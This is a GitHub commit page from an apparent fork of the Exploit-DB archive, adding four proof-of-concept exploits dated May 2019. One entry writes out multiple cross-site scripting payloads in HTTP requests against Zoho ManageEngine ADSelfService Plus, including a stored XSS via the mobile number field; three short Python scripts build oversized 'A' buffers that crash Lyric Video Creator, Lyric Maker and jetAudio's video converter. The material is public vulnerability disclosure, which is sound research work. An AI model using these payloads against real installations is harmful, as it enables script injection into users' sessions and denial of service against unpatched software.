forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
4 changes to exploits/shellcodes Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC) Lyric Maker 2.0.1.0 - Denial of Service (PoC) Convert Video jetAudio 8.1.7 - Denial of Service (PoC) Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting
- Loading branch information
Offensive Security
committed
May 10, 2019
1 parent
5a4d21a
commit 61e7eef
Showing
5 changed files
with
117 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,50 @@ | ||
[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting | ||
[+] Author: Ibrahim Raafat | ||
[+] Twitter: https://twitter.com/RaafatSEC | ||
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html? | ||
|
||
|
||
[+] TimeLine | ||
[-] Nov 23, 2018 Reported | ||
[-] Nov 26, 2018 Triaged | ||
[-] Dec 27, 2018 Fixed | ||
[-] May 08, 2019 Public Disclosure | ||
|
||
[+] Description: | ||
Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites | ||
|
||
[+] POC | ||
|
||
[-] Employee search form | ||
|
||
POST /EmployeeSearch.cc?actionId=Search HTTP/1.1 | ||
|
||
searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf= | ||
searchType parameter: | ||
searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf= | ||
|
||
|
||
2- Employee Search – ascending parameter | ||
|
||
/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1 | ||
|
||
selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf= | ||
|
||
|
||
3- EmpSearch.cc - searchString parameter | ||
|
||
POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1 | ||
|
||
&adscsrf= | ||
|
||
4- Stored XSS in self-update layout implementation. | ||
|
||
/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields | ||
Insert the following payload into Mobile Number field, and save | ||
Payload: 11111111]";a=alert,a(31337)// | ||
Code execute here: | ||
/Enrollment.do?selectedTab=Enrollment | ||
|
||
|
||
[+] Assigned CVE: CVE-2018-20484,CVE-2018-20485 | ||
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
# -*- coding: utf-8 -*- | ||
# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC) | ||
# Date: 08/05/2019 | ||
# Author: Alejandra Sánchez | ||
# Vendor Homepage: https://lyricvideocreator.com/ | ||
# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe | ||
# Version: 2.1 | ||
# Tested on: Windows 10 | ||
|
||
# Proof of Concept: | ||
# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3" | ||
# 2.- Open LyricVideoCreator.exe | ||
# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button | ||
# 5.- Crashed | ||
|
||
buffer = "\x41" * 5000 | ||
f = open ("sample.mp3", "w") | ||
f.write(buffer) | ||
f.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
# -*- coding: utf-8 -*- | ||
# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC) | ||
# Date: 08/05/2019 | ||
# Author: Alejandra Sánchez | ||
# Vendor Homepage: http://www.jetaudio.com/ | ||
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe | ||
# Version: 2.0.1.0 | ||
# Tested on: Windows 10 | ||
|
||
# Proof of Concept: | ||
# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt" | ||
# 2.- Copy the text from the generated LyricMaker.txt file to clipboard | ||
# 3.- Open JetLyric.exe or Lyric Maker | ||
# 4.- Paste clipboard in in the field "Title" | ||
# 5.- Go to file -> Save Lyric... | ||
# 6.- Save the file with any name, e.g 'sample.jlr' | ||
# 7.- Crashed | ||
|
||
buffer = "\x41" * 5000 | ||
f = open ("LyricMaker.txt", "w") | ||
f.write(buffer) | ||
f.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
# -*- coding: utf-8 -*- | ||
# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC) | ||
# Date: 08/05/2019 | ||
# Author: Alejandra Sánchez | ||
# Vendor Homepage: http://www.jetaudio.com/ | ||
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe | ||
# Version: 8.1.7 | ||
# Tested on: Windows 10 | ||
|
||
# Proof of Concept: | ||
# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt" | ||
# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard | ||
# 3.- Open JetVidCnv.exe or Video Converter | ||
# 4.- Click on the 'Add Files...' button and select a video file | ||
# 5.- Paste clipboard in in the field "File Naming" | ||
# 6.- Click on the 'Preview' button | ||
# 7.- Crashed | ||
|
||
buffer = "\x41" * 512 | ||
f = open ("ConvertVideo.txt", "w") | ||
f.write(buffer) | ||
f.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters